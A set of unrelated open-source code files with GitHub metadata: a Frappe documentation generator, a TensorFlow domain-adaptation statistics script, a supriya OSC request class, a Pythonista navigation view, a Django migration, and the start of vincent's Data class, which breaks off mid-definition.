# make home page
with open(os.path.join(path, "index.html"), "w") as home:
home.write(frappe.render_template("templates/autodoc/docs_home.html",
self.app_context))
# make folders
self.models_base_path = os.path.join(path, "models")
self.make_folder(self.models_base_path,
template = "templates/autodoc/models_home.html")
self.api_base_path = os.path.join(path, "api")
self.make_folder(self.api_base_path,
template = "templates/autodoc/api_home.html")
for basepath, folders, files in os.walk(self.app_path):
if "doctype" not in basepath:
if "doctype" in folders:
module = os.path.basename(basepath)
module_folder = os.path.join(self.models_base_path, module)
self.make_folder(module_folder,
template = "templates/autodoc/module_home.html",
context = {"name": module})
self.update_index_txt(module_folder)
if "doctype" in basepath:
parts = basepath.split("/")
#print parts
module, doctype = parts[-3], parts[-1]
if doctype not in ("doctype", "boilerplate"):
self.write_model_file(basepath, module, doctype)
elif self.is_py_module(basepath, folders, files):
self.write_modules(basepath, folders, files)
def is_py_module(self, basepath, folders, files):
return "__init__.py" in files \
and (not "/doctype" in basepath) \
and (not "/patches" in basepath) \
and (not "/change_log" in basepath) \
and (not "/report" in basepath) \
and (not "/page" in basepath) \
and (not "/templates" in basepath) \
and (not "/tests" in basepath) \
and (not "doctype" in folders)
def write_modules(self, basepath, folders, files):
module_folder = os.path.join(self.api_base_path, os.path.relpath(basepath, self.app_path))
self.make_folder(module_folder)
for f in files:
if f.endswith(".py"):
module_name = os.path.relpath(os.path.join(basepath, f),
self.app_path)[:-3].replace("/", ".").replace(".__init__", "")
module_doc_path = os.path.join(module_folder,
self.app + "." + module_name + ".html")
self.make_folder(basepath)
if not os.path.exists(module_doc_path):
print "Writing " + module_doc_path
with open(module_doc_path, "w") as f:
context = {"name": self.app + "." + module_name}
context.update(self.app_context)
f.write(frappe.render_template("templates/autodoc/pymodule.html",
context))
self.update_index_txt(module_folder)
def make_folder(self, path, template=None, context=None):
if not template:
template = "templates/autodoc/package_index.html"
if not os.path.exists(path):
os.makedirs(path)
index_txt_path = os.path.join(path, "index.txt")
print "Writing " + index_txt_path
with open(index_txt_path, "w") as f:
f.write("")
index_html_path = os.path.join(path, "index.html")
if not context:
name = os.path.basename(path)
if name==".":
name = self.app
context = {
"title": name
}
context.update(self.app_context)
print "Writing " + index_html_path
with open(index_html_path, "w") as f:
f.write(frappe.render_template(template, context))
def update_index_txt(self, path):
index_txt_path = os.path.join(path, "index.txt")
pages = filter(lambda d: (d.endswith(".html") and d!="index.html") \
or os.path.isdir(os.path.join(path, d)), os.listdir(path))
pages = [d.rsplit(".", 1)[0] for d in pages]
with open(index_txt_path, "r") as f:
index_parts = filter(None, f.read().splitlines())
if not set(pages).issubset(set(index_parts)):
print "Updating " + index_txt_path
with open(index_txt_path, "w") as f:
f.write("\n".join(pages))
def write_model_file(self, basepath, module, doctype):
model_path = os.path.join(self.models_base_path, module, doctype + ".html")
if not os.path.exists(model_path):
model_json_path = os.path.join(basepath, doctype + ".json")
if os.path.exists(model_json_path):
with open(model_json_path, "r") as j:
doctype_real_name = json.loads(j.read()).get("name")
print "Writing " + model_path
with open(model_path, "w") as f:
context = {"doctype": doctype_real_name}
context.update(self.app_context)
f.write(frappe.render_template("templates/autodoc/doctype.html",
context).encode("utf-8"))
|
{
"content_hash": "1d860b3e66844c1265d56d2366572998",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 92,
"avg_line_length": 31.987951807228917,
"alnum_prop": 0.6532956685499058,
"repo_name": "ashokrajbathu/secondrep",
"id": "a9e0f61b28d3e3b97b857c6f81ac0f529b9d003a",
"size": "5310",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "frappe/utils/setup_docs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "237895"
},
{
"name": "HTML",
"bytes": "133550"
},
{
"name": "JavaScript",
"bytes": "1332932"
},
{
"name": "Python",
"bytes": "1103936"
},
{
"name": "Shell",
"bytes": "517"
}
],
"symlink_target": ""
}
|
import os, sys
import argparse
import types
import glob
import numpy as np
import pickle
import tensorflow as tf
import data
import model
from util import *
from learning import LearnerCls, LearnerDACls, LearnerClsSelf, LearnerConfPred
from learning import TempScalingCls as CalibratorCls
##TODO: clean-up tf options
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
#gpus = tf.config.experimental.list_physical_devices('GPU')
#tf.config.experimental.set_memory_growth(gpus[0], True)
def main(args):
# ## init a snapshot path
# os.makedirs(args.train.save_root, exist_ok=True)
# ## init logger
# sys.stdout = Logger(os.path.join(args.train.save_root, 'out'))
# ## print args
# print_args(args)
snap_list = glob.glob(args.snapshot_prefix + '_*')
print(snap_list)
print("# experiments = ", len(snap_list))
## init gpus
if not args.cpu:
print("##GPUs Available: ", len(tf.config.experimental.list_physical_devices('GPU')))
print()
## init datasets
print("## init datasets")
ds_src = data.MultiSourceDataset(
args.data.src,
args.aug_params,
batch_size=args.data.batch_size,
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[0],
resize_pad=True if len(args.data.src)==1 and args.data.src[0]=='MNIST' and args.data.tar=='SVHN' else False, ##TODO: check if it's necessary
)
assert(len(args.aug_params) == 1) ##TODO
ds_tar = getattr(data, args.data.tar)(
root=os.path.join('data', args.data.tar.lower()),
batch_size=args.data.batch_size,
aug_list=args.aug_params[0],
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[1])
ds_dom = data.DomainDataset(
data.MultiSourceDataset(
args.data.src,
args.aug_params,
batch_size=args.data.batch_size,
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True, test_aug=True, # augment all splits
domain_id=1,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[0],
resize_pad=True if len(args.data.src)==1 and args.data.src[0]=='MNIST' and args.data.tar=='SVHN' else False, ##TODO: check if it's necessary
),
getattr(data, args.data.tar)(
root=os.path.join('data', args.data.tar.lower()),
batch_size=args.data.batch_size,
aug_list=args.aug_params[0],
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True, test_aug=True, # augment all splits
domain_id=0,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[1]))
##TODO: redundant
ds_src_init = data.MultiSourceDataset(
args.data.src,
args.aug_params_init,
batch_size=args.data.batch_size,
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],##TODO
sample_ratio=args.data.sample_ratio[0],
resize_pad=True if len(args.data.src)==1 and args.data.src[0]=='MNIST' and args.data.tar=='SVHN' else False, ##TODO: check if it's necessary
)
assert(len(args.aug_params) == 1) ##TODO
ds_tar_init = getattr(data, args.data.tar)(
root=os.path.join('data', args.data.tar.lower()),
batch_size=args.data.batch_size,
aug_list=args.aug_params_init[0],##TODO
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[1])
ds_dom_init = data.DomainDataset(
data.MultiSourceDataset(
args.data.src,
args.aug_params_init,
batch_size=args.data.batch_size,
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True, test_aug=True, # augment all splits
domain_id=1,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[0],
resize_pad=True if len(args.data.src)==1 and args.data.src[0]=='MNIST' and args.data.tar=='SVHN' else False, ##TODO: check if it's necessary
),
getattr(data, args.data.tar)(
root=os.path.join('data', args.data.tar.lower()),
batch_size=args.data.batch_size,
aug_list=args.aug_params_init[0], ##TODO
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True, test_aug=True, # augment all splits
domain_id=0,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[1]))
##TODO: redundant
ds_src_self = data.MultiSourceDataset(
args.data.src,
args.aug_params,
batch_size=args.data.batch_size,
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
domain_id=1,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[0],
resize_pad=True if len(args.data.src)==1 and args.data.src[0]=='MNIST' and args.data.tar=='SVHN' else False, ##TODO: check if...
)
assert(len(args.aug_params) == 1) ##TODO
ds_tar_self = getattr(data, args.data.tar)(
root=os.path.join('data', args.data.tar.lower()),
batch_size=args.data.batch_size,
aug_list=args.aug_params[0],
train_shuffle=True, train_aug=True, val_shuffle=True, val_aug=True,
domain_id=0,
color=False if args.data.img_size[2]==1 else True,
size=args.data.img_size[0],
sample_ratio=args.data.sample_ratio[1],
double_aug=True if args.training_type=='selfcon' else False,
)
print()
if args.merge_train_val:
ds_src.train = data.ChainLoader(ds_src.train, ds_src.val)
ds_dom.train = data.ChainLoader(ds_dom.train, ds_dom.val)
## collect stats
cls_error_init_list, cal_error_init_list = [], []
cls_error_list, cal_error_list = [], []
perf_epoch_list = []
for snap_root in snap_list:
##
## final student
##
## a student model
mdl_st_base = getattr(model, args.model.base)(num_class=args.model.n_labels, input_shape=args.model.img_size)
mdl_st = model.Student(args.model, mdl_st_base, ds_src_self, ds_tar_self, ideal=args.ideal)
## load the final student
mdl_st.model_base.load_weights(os.path.join(snap_root, 'model_params_final'))
## evaluate
learner = LearnerClsSelf(None, None, mdl_st, None)
error, ece, *_ = learner.test(ds_tar.test, ld_name=args.data.tar, verbose=True)
cls_error_list = np.append(cls_error_list, error.numpy())
cal_error_list = np.append(cal_error_list, ece)
print(f"[final, {args.snapshot_prefix}, cls error, n = {len(cls_error_list)}] mean = {np.mean(cls_error_list*100.0):.2f}%, std = {np.std(cls_error_list*100.0):.2f}%")
print(f"[final, {args.snapshot_prefix}, cal error, n = {len(cal_error_list)}] mean = {np.mean(cal_error_list*100.0):.2f}%, std = {np.std(cal_error_list*100.0):.2f}%")
##
## init student
##
## load the init student
mdl_fn_init = os.path.basename(glob.glob(os.path.join(snap_root, 'model_params_*init*.index'))[0])
mdl_fn_init = mdl_fn_init[:mdl_fn_init.rfind('_')]
if 'sourceonly' in mdl_fn_init:
mdl_st.model_base.load_weights(os.path.join(snap_root, mdl_fn_init+'_best'))
learner = LearnerClsSelf(None, None, mdl_st, None)
else:
assert('advtr' in mdl_fn_init)
## init an adversarial model
mdl_adv = getattr(model, args.train_advtr.model_advtr)(n_in=mdl_st.model_base.dim_feat)
mdl_st_adv = model.DAN(mdl_st.model_base, mdl_adv)
mdl_st_adv.load_weights(os.path.join(snap_root, mdl_fn_init+'_final'))
## init a learner
learner = LearnerDACls(None, mdl_st_adv)
## evaluate
error, ece, *_ = learner.test(ds_tar.test, ld_name=args.data.tar, verbose=True)
cls_error_init_list = np.append(cls_error_init_list, error.numpy())
cal_error_init_list = np.append(cal_error_init_list, ece)
print(f"[init, {args.snapshot_prefix}, cls error, n = {len(cls_error_init_list)}] mean = {np.mean(cls_error_init_list*100.0):.2f}%, std = {np.std(cls_error_init_list*100.0):.2f}%")
print(f"[init, {args.snapshot_prefix}, cal error, n = {len(cal_error_init_list)}] mean = {np.mean(cal_error_init_list*100.0):.2f}%, std = {np.std(cal_error_init_list*100.0):.2f}%")
##
## teacher performance at each step
##
if args.no_mid_results:
continue
cls_error_epoch_list, cal_error_epoch_list, prec_epoch_list, cov_epoch_list = [], [], [], []
for i_epoch in range(1, args.train.n_epochs): # ignore the last
## load
print("!!!! currently load best, but may load final later")
mdl_st.model_base.load_weights(os.path.join(snap_root, f'model_params_base_epoch_{i_epoch}_best'))
## cls/cal error
learner = LearnerClsSelf(None, None, mdl_st, None)
error, ece, *_ = learner.test(ds_tar.test, ld_name=args.data.tar, verbose=True)
print(error.numpy(), ece)
## precision/coverage
learner = LearnerConfPred(None, mdl_st.model_conf, mdl_st.model_base)
## set a constant
mdl_st.model_conf.T = tf.Variable(1.0 - args.train_conf.eps)
## test the model
prec, n_conf, n = learner.test(ds_tar.test, ld_name='tar', verbose=True)
cls_error_epoch_list.append(error.numpy())
cal_error_epoch_list.append(ece)
prec_epoch_list.append(prec.numpy())
cov_epoch_list.append(float(n_conf.numpy())/float(n))
perf_epoch_list.append({
'cls_error': np.array(cls_error_epoch_list),
'cal_error': np.array(cal_error_epoch_list),
'prec': np.array(prec_epoch_list),
'cov': np.array(cov_epoch_list)})
print()
## save
fn = args.snapshot_prefix + '.pk'
pickle.dump(
{
'cls_error_init': cls_error_init_list,
'cal_error_init': cal_error_init_list,
'cls_error': cls_error_list,
'cal_error': cal_error_list,
'perf_epoch': perf_epoch_list
},
open(fn, 'wb'))
def init_aug_params(aug, args):
aug_params = []
for a in aug:
if a == 'jitter':
aug_params.append([('jitter', {'brightness': 0.4, 'contrast': 0.4, 'saturation': 0.4})])
# elif a == 'shake':
# args.aug_params.append([('randaug', {'size': 32, 'mode': 'SHAKE'})])
elif a == 'svhnspec':
aug_params.append([
('intensity_flip', {}),
('intensity_scaling', {'min': -1.5, 'max': 1.5}),
('intensity_offset', {'min': -0.5, 'max': 0.5}),
('affine', {'std': 0.1}),
('translation', {'x_max': 2.0, 'y_max': 2.0}),
('gaussian', {'std': 0.1}),
])
elif a == 'translation':
aug_params.append([
('translation', {'x_max': 2.0, 'y_max': 2.0}),
])
elif a == 'randaug':
aug_params.append([('randaug', {'size': args.data.img_size[0]})])
else:
##TODO: simplify
aug_params.append(None)
return aug_params
def parse_args():
## init a parser
parser = argparse.ArgumentParser(description='digit dataset training')
## meta args
parser.add_argument('--snapshot_prefix', type=str, required=True)
parser.add_argument('--no_mid_results', action='store_true')
#parser.add_argument('--exp_name', required=True, type=str, help='experiment name')
#parser.add_argument('--snapshot_root', default='snapshots', type=str, help='snapshot root name')
parser.add_argument('--cpu', action='store_true', help='use CPU')
parser.add_argument('--ideal', action='store_true', help='enable cheatkey')
parser.add_argument('--merge_train_val', action='store_true', help='merge train and validation sets')
parser.add_argument('--training_type', type=str, default='selfcon', help='training type') ## selfcon, self, advtr, srconly
## dataset args
parser.add_argument('--data.batch_size', default=100, type=int, help='batch size')
parser.add_argument('--data.n_labels', default=10, type=int, help='the number of labels')
parser.add_argument('--data.src', type=str, nargs='*', default=['MNIST'], help='list of sources')
parser.add_argument('--data.tar', type=str, default='USPS', help='target')
parser.add_argument('--data.aug', type=str, nargs='*', default=[''], help='list of data augmentation')
parser.add_argument('--data.aug_init', type=str, nargs='*', default=[''], help='list of data augmentation')
parser.add_argument('--data.img_size', type=int, nargs=3, default=(32, 32, 3), help='image size')
parser.add_argument('--data.sample_ratio', type=float, nargs=2, default=[1.0, 1.0])
## model args
parser.add_argument('--model.base', default='ResNet18', type=str, help='model name')
parser.add_argument('--model.conf', default='ConfPred', type=str, help='model name')
parser.add_argument('--model.iw', default='BigFNN', type=str, help='model name')
# ## self-train args
# parser.add_argument('--train.rerun', action='store_true', help='find the best model')
# #parser.add_argument('--train.load_final', action='store_true', help='load the final model')
parser.add_argument('--train.n_epochs', type=int, default=50, help='the number of training iterations')
# parser.add_argument('--train.init_advtr', action='store_true', help='model initialization approach')
# parser.add_argument('--train.val_period', default=1, type=int, help='validation period in epochs')
# ## base model train args
# parser.add_argument('--train_base.rerun', action='store_true', help='find the best model')
# #parser.add_argument('--train_base.load_final', action='store_true', help='load the final model')
# parser.add_argument('--train_base.optim', default='SGD', type=str, help='optimizer')
# parser.add_argument('--train_base.lr', default=0.01, type=float, help='learning rate')
# parser.add_argument('--train_base.lr_step_size', default=5, type=float, help='stepsize for step learning rate scheduler')
# parser.add_argument('--train_base.lr_step_decay_rate', default=0.5, type=float, help='decay rate for step learning rate scheduler')
# parser.add_argument('--train_base.weight_decay', type=float, default=0.0, help='L2 weight decay')
# parser.add_argument('--train_base.momentum', default=0.9, type=float, help='momentum')
# parser.add_argument('--train_base.n_epochs', default=25, type=int, help='the number of epochs')
# parser.add_argument('--train_base.val_period', default=1, type=int, help='validation period in epochs')
# ## iw train args
# parser.add_argument('--train_iw.rerun', action='store_true', help='find the best model')
# parser.add_argument('--train_iw.load_final', action='store_true', help='load the final model')
# parser.add_argument('--train_iw.optim', default='SGD', type=str, help='optimizer')
# parser.add_argument('--train_iw.lr', default=0.01, type=float, help='learning rate')
# parser.add_argument('--train_iw.lr_step_size', default=20, type=float, help='stepsize for step learning rate scheduler')
# parser.add_argument('--train_iw.lr_step_decay_rate', default=0.5, type=float, help='decay rate for step learning rate scheduler')
# parser.add_argument('--train_iw.weight_decay', type=float, default=0.0, help='L2 weight decay')
# parser.add_argument('--train_iw.momentum', default=0.9, type=float, help='momentum')
# parser.add_argument('--train_iw.n_epochs', default=100, type=int, help='the number of epochs')
# parser.add_argument('--train_iw.val_period', default=1, type=int, help='validation period in epochs')
# ## cal args
# parser.add_argument('--cal_iw.rerun', action='store_true', help='find the best model')
# parser.add_argument('--cal_iw.load_final', action='store_true', help='load the final model')
# parser.add_argument('--cal_iw.optim', default='SGD', type=str, help='optimizer')
# parser.add_argument('--cal_iw.lr', default=0.01, type=float, help='learning rate')
# parser.add_argument('--cal_iw.lr_step_size', default=50, type=float, help='stepsize for step learning rate scheduler')
# parser.add_argument('--cal_iw.lr_step_decay_rate', default=0.5, type=float, help='decay rate for step learning rate scheduler')
# parser.add_argument('--cal_iw.weight_decay', type=float, default=0.0, help='L2 weight decay')
# parser.add_argument('--cal_iw.momentum', default=0.9, type=float, help='momentum')
# parser.add_argument('--cal_iw.n_epochs', default=500, type=int, help='the number of epochs')
# parser.add_argument('--cal_iw.val_period', default=1, type=int, help='validation period in epochs')
# ## train args
# parser.add_argument('--train_advtr.rerun', action='store_true', help='find the best model')
# #parser.add_argument('--train_advtr.load_final', action='store_true', help='load the final model')
# parser.add_argument('--train_advtr.optim', default='SGD', type=str, help='optimizer')
# parser.add_argument('--train_advtr.lr', default=0.01, type=float, help='learning rate')
# parser.add_argument('--train_advtr.lr_step_size', default=20, type=float, help='stepsize for step learning rate scheduler')
# parser.add_argument('--train_advtr.lr_step_decay_rate', default=0.5, type=float, help='decay rate for step learning rate scheduler')
# parser.add_argument('--train_advtr.weight_decay', type=float, default=0.0, help='L2 weight decay')
# parser.add_argument('--train_advtr.momentum', default=0.9, type=float, help='momentum')
# parser.add_argument('--train_advtr.n_epochs', default=100, type=int, help='the number of epochs')
# parser.add_argument('--train_advtr.val_period', default=1, type=int, help='validation period in epochs')
# parser.add_argument('--train_advtr.advtr_type', type=str, default='DANN', help='domain-adversarial training type')
parser.add_argument('--train_advtr.model_advtr', type=str, default='BigAdvFNN', help='adversarial network name')
# parser.add_argument('--train_advtr.reg_param_adv', type=float, default=1.0, help='adversarial loss regularization parameter')
# parser.add_argument('--train_advtr.no_adv_reg_schedule', action='store_true', help='do not schedule the adversarial loss regularization parameter')
# ## base model init train args
# parser.add_argument('--train_base_init.rerun', action='store_true', help='find the best model')
# parser.add_argument('--train_base_init.load_final', action='store_true', help='load the final model')
# parser.add_argument('--train_base_init.optim', default='SGD', type=str, help='optimizer')
# parser.add_argument('--train_base_init.lr', default=0.01, type=float, help='learning rate')
# parser.add_argument('--train_base_init.lr_step_size', default=20, type=float, help='stepsize for step learning rate scheduler')
# parser.add_argument('--train_base_init.lr_step_decay_rate', default=0.5, type=float, help='decay rate for step learning rate scheduler')
# parser.add_argument('--train_base_init.weight_decay', type=float, default=0.0, help='L2 weight decay')
# parser.add_argument('--train_base_init.momentum', default=0.9, type=float, help='momentum')
# parser.add_argument('--train_base_init.n_epochs', default=100, type=int, help='the number of epochs')
# parser.add_argument('--train_base_init.val_period', default=1, type=int, help='validation period in epochs')
# ## conf args
# #parser.add_argument('--train_conf.rerun', action='store_true', help='find the best model')
# #parser.add_argument('--train_conf.load_final', action='store_true', help='load the final model')
parser.add_argument('--train_conf.eps', type=float, default=0.01, help='epsilon')
args = parser.parse_args()
args = to_tree_namespace(args)
## duplicate
##TODO: better way?
# args.train.save_root = os.path.join(args.snapshot_root, args.exp_name)
# args.train_base.save_root = args.train.save_root
# args.train_iw.save_root = args.train.save_root
# args.cal_iw.save_root = args.train.save_root
# args.train_advtr.save_root = args.train.save_root
# args.train_base_init.save_root = args.train.save_root
# args.train_conf.save_root = args.train.save_root
args.model.n_labels = args.data.n_labels
args.model.img_size = args.data.img_size
# args.train_advtr.schedule_reg_param_adv = not args.train_advtr.no_adv_reg_schedule
# args.train_advtr.load_final = True
#args.train.load_final = True
#args.train_base.load_final = True
## init aug parameters
args.aug_params = init_aug_params(args.data.aug, args)
args.aug_params_init = init_aug_params(args.data.aug_init, args)
# args.aug_params = []
# for a in args.data.aug:
# if a == 'jitter':
# args.aug_params.append([('jitter', {'brightness': 0.4, 'contrast': 0.4, 'saturation': 0.4})])
# # elif a == 'shake':
# # args.aug_params.append([('randaug', {'size': 32, 'mode': 'SHAKE'})])
# elif a == 'svhnspec':
# args.aug_params.append([
# ('intensity_flip', {}),
# ('intensity_scaling', {'min': -1.5, 'max': 1.5}),
# ('intensity_offset', {'min': -0.5, 'max': 0.5}),
# ('affine', {'std': 0.1}),
# ('translation', {'x_max': 2.0, 'y_max': 2.0}),
# ('gaussian', {'std': 0.1}),
# ])
# elif a == 'translation':
# args.aug_params.append([
# ('translation', {'x_max': 2.0, 'y_max': 2.0}),
# ])
# elif a == 'randaug':
# args.aug_params.append([('randaug', {'size': args.data.img_size[0]})])
# else:
# ##TODO: simplify
# args.aug_params.append(None)
return args
if __name__ == '__main__':
args = parse_args()
main(args)
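# Illustrative invocation sketch (not part of the original script). The snapshot
# prefix below is hypothetical; the data arguments mirror the parser defaults above.
#
#     python compute_stats.py \
#         --snapshot_prefix snapshots/mnist_to_usps \
#         --data.src MNIST --data.tar USPS \
#         --data.img_size 32 32 3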
|
{
"content_hash": "95c21fcc30ee04c74035384790e0a86f",
"timestamp": "",
"source": "github",
"line_count": 474,
"max_line_length": 188,
"avg_line_length": 49.040084388185655,
"alnum_prop": 0.6138524413852441,
"repo_name": "googleinterns/intern2020_cocal",
"id": "db7bd30ccce68349f1627862836f7a983f8b6992",
"size": "23245",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "uncertainty/plots/compute_stats.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "293984"
},
{
"name": "Shell",
"bytes": "3237"
}
],
"symlink_target": ""
}
|
import collections
from supriya.tools import osctools
from supriya.tools.requesttools.Request import Request
class NodeAfterRequest(Request):
### CLASS VARIABLES ###
__slots__ = (
'_node_id_pairs',
)
### INITIALIZER ###
def __init__(
self,
node_id_pairs=None,
):
from supriya.tools import requesttools
Request.__init__(self)
if node_id_pairs:
if not isinstance(node_id_pairs, collections.Sequence):
node_id_pairs = [node_id_pairs]
prototype = requesttools.NodeIdPair
assert all(isinstance(x, prototype) for x in node_id_pairs)
node_id_pairs = tuple(node_id_pairs)
self._node_id_pairs = node_id_pairs
### PUBLIC METHODS ###
def to_osc_message(self):
request_id = int(self.request_id)
contents = [request_id]
if self.node_id_pairs:
for node_id_pair in self.node_id_pairs:
contents.append(node_id_pair.node_id)
contents.append(node_id_pair.target_node_id)
message = osctools.OscMessage(*contents)
return message
### PUBLIC PROPERTIES ###
@property
def node_id_pairs(self):
return self._node_id_pairs
@property
def response_specification(self):
return None
@property
def request_id(self):
from supriya.tools import requesttools
return requesttools.RequestId.NODE_AFTER
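# Illustrative usage sketch (not part of the original class). It assumes that
# requesttools.NodeIdPair accepts node_id / target_node_id keyword arguments,
# matching the attribute names read in to_osc_message() above.
def _example_node_after_request():
    from supriya.tools import requesttools
    pair = requesttools.NodeIdPair(node_id=1001, target_node_id=1000)
    request = NodeAfterRequest(node_id_pairs=pair)
    return request.to_osc_message()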
|
{
"content_hash": "ad289c4bd90dfa0716e1f9c499c6941b",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 71,
"avg_line_length": 26.90909090909091,
"alnum_prop": 0.597972972972973,
"repo_name": "andrewyoung1991/supriya",
"id": "1cede7b1949404ae8587adea6d642c8ab63aa6c6",
"size": "1506",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "supriya/tools/requesttools/NodeAfterRequest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "6712"
},
{
"name": "CSS",
"bytes": "446"
},
{
"name": "HTML",
"bytes": "1083"
},
{
"name": "JavaScript",
"bytes": "6163"
},
{
"name": "Makefile",
"bytes": "6775"
},
{
"name": "Python",
"bytes": "2693776"
}
],
"symlink_target": ""
}
|
import ui
from view_lock import *
from view_messages import *
from view_settings import *
def make_button_item(action, image_name):
return ui.ButtonItem(action=action, image=ui.Image.named(image_name))
class NavController(ui.View):
def __init__(self):
self.vc = {}
#
self.vc['lock'] = LockController()
self.vc['lock'].set_unlock_callback(self.unlock)
#
self.vc['messages'] = MessagesController()
self.vc['messages'].view.right_button_items = [make_button_item(self.bt_settings, 'ionicons-gear-a-24')]
#
self.vc['settings'] = SettingsController()
#
self.nav_view = ui.NavigationView(self.vc['lock'].view)
self.nav_view.present(hide_title_bar=True)
def unlock(self):
self.nav_view.push_view(self.vc['messages'].view)
def bt_settings(self,sender):
self.nav_view.push_view(self.vc['settings'].view)
NavController()
|
{
"content_hash": "965765493215c81f4a0a511d0d2a28cf",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 106,
"avg_line_length": 26.71875,
"alnum_prop": 0.7005847953216374,
"repo_name": "jadeblaquiere/controller-example",
"id": "ecbbe4f4b98e2fe7b87f621acd7e495ffb062740",
"size": "872",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "view_main.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "3330"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('blogapp', '0005_sponsors'),
]
operations = [
migrations.AddField(
model_name='sponsors',
name='picture',
field=models.ImageField(default=datetime.datetime(2015, 11, 18, 16, 16, 34, 942326, tzinfo=utc), upload_to=b'sponsors'),
preserve_default=False,
),
]
|
{
"content_hash": "fc3ec66a6f88ff1d86a01b9dc06925ab",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 132,
"avg_line_length": 25.761904761904763,
"alnum_prop": 0.6303142329020333,
"repo_name": "jgsjv/treinamento_django",
"id": "dc6b76b69e10b9309747c90d11fe1de572e0583a",
"size": "565",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blog/blogapp/migrations/0006_sponsors_picture.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "13731"
},
{
"name": "Python",
"bytes": "24150"
}
],
"symlink_target": ""
}
|
"""
Data: Vincent Data Class for data importing and Vega Data type
"""
from __future__ import (print_function, division)
import time
import json
from .core import (
_assert_is_type,
ValidationError,
grammar,
GrammarClass,
LoadError
)
from ._compat import str_types
try:
import pandas as pd
except ImportError:
pd = None
try:
import numpy as np
except ImportError:
np = None
class Data(GrammarClass):
"""Data container for visualization
The Vega document may contain the data itself or a reference to a URL
containing the data and formatting instructions. Additionally, new data
can be created from old data via the transform fields.
"""
_default_index_key = 'idx'
def __init__(self, name=None, **kwargs):
"""Initialize a Data object
Parameters
----------
name : string, default None
Name of the data set. If None (default), then the name will be
set to ``'table'``.
**kwargs : dict
Attributes to set on initialization.
"""
super(self.__class__, self).__init__(**kwargs)
self.name = name if name else 'table'
@grammar(str_types)
def name(value):
"""string : Name of the data
This is used by other components (``Mark``, etc.) for reference.
"""
@grammar(str_types)
def url(value):
"""string : URL from which to load the data
This can be used as an alternative to defining the data in the
``values`` attribute.
"""
@grammar(list)
def values(value):
"""list : Data contents
Data is represented in tabular form, where each element of
``values`` corresponds to a row of data. Each row of data is
represented by a dict or a raw number. The keys of the dict are
columns and the values are individual data points. The keys of the
dicts must be strings for the data to correctly serialize to JSON.
The data will often have an "index" column representing the
independent variable, with the remaining columns representing the
dependent variables, though this is not required. The ``Data`` class
itself, however, is agnostic to which columns are dependent and
independent.
For example, the values attribute
``[{'x': 0, 'y': 3.2}, {'x': 1, 'y': 1.3}]``
could represent two rows of two variables - possibly an independent
variable ``'x'`` and a dependent variable ``'y'``.
For simple data sets, an alternative values attribute could be a
simple list of numbers such as
``[2, 12, 3, 5]``.
It may be more convenient to load data from pandas or NumPy objects.
See the methods :func:`Data.from_pandas` and
:func:`Data.from_numpy`.
"""
for row in value:
_assert_is_type('values row', row, (float, int, dict))
@grammar(str_types)
def source(value):
"""string : ``name`` field of another data set
This is typically used with data transforms to create new data
values.
"""
@grammar(list)
def transform(value):
"""list : transforms to apply to the data
Note: Transform-relational classes are not yet implemented.
"""
@grammar(dict)
def format(value):
"""dict : information about the data format
This is only used when loading data from the ``url`` attribute.
Format-relational classes are not yet implemented.
"""
def validate(self, *args):
"""Validate contents of class
"""
super(self.__class__, self).validate(*args)
if not self.name:
raise ValidationError('name is required for Data')
@staticmethod
def serialize(obj):
"""Convert an object into a JSON-serializable value
This is used by the ``from_pandas`` and ``from_numpy`` functions to
convert data to JSON-serializable types when loading.
"""
if isinstance(obj, str_types):
return obj
elif hasattr(obj, 'timetuple'):
return int(time.mktime(obj.timetuple())) * 1000
elif hasattr(obj, 'item'):
return obj.item()
elif hasattr(obj, '__float__'):
if isinstance(obj, int):
return int(obj)
else:
return float(obj)
elif hasattr(obj, '__int__'):
return int(obj)
else:
raise LoadError('cannot serialize index of type '
+ type(obj).__name__)
@classmethod
def from_pandas(cls, data, columns=None, key_on='idx', name=None,
series_key='data', grouped=False, records=False, **kwargs):
